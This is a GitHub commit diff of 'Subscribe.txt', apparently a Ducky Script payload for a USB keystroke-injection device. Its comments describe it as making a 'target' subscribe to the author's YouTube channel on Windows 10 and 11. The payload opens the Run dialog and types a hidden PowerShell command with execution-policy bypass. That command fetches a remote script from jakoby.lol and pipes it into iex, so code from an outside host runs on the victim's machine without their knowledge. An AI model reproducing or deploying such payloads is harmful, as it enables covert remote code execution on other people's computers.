Update Subscribe.txt

This commit is contained in:
I-Am-Jakoby 2023-01-15 14:42:58 -06:00 committed by GitHub
parent 1bfa71889e
commit 20c56d7703
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -6,7 +6,9 @@ REM Description: This payload is meant to make your target subscribe to your
REM Target: Windows 10, 11
REM Your youtube url needs to be inside both double and single quotes " ' url ' "
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $channel='youtube.com/iamjakoby';irm jakoby.lol/wj4 | iex
STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
ENTER